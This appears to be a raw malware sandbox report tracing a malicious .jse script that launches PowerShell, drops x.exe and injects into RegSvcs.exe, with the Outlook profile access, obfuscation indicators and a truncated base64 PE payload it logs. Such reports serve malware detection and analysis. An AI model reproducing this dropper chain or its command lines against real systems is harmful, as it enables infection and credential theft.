              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJSE@8/8@3/3
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044AF6C GetLastError,FormatMessageW,5_2_0044AF6C
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464EAE
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,5_2_0045D619
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,5_2_004755C4
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,5_2_0047839D
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_0043305F
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\gj7umd[1].ps1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2564:120:WilError_03
              Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeCommand line argument: Wu5_2_0040D6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: doc00290320092.jseReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADCHpS/hn/67I
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
              Source: x.exe.3.drStatic PE information: real checksum: 0xa961f should be: 0xf93a0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4A930988 push E95AFAD0h; ret 3_2_00007FFB4A9309C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4A9300BD pushad ; iretd 3_2_00007FFB4A9300C1
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0570E3E0 pushfd ; retf 6_2_0570E3E1
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_0047A330
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
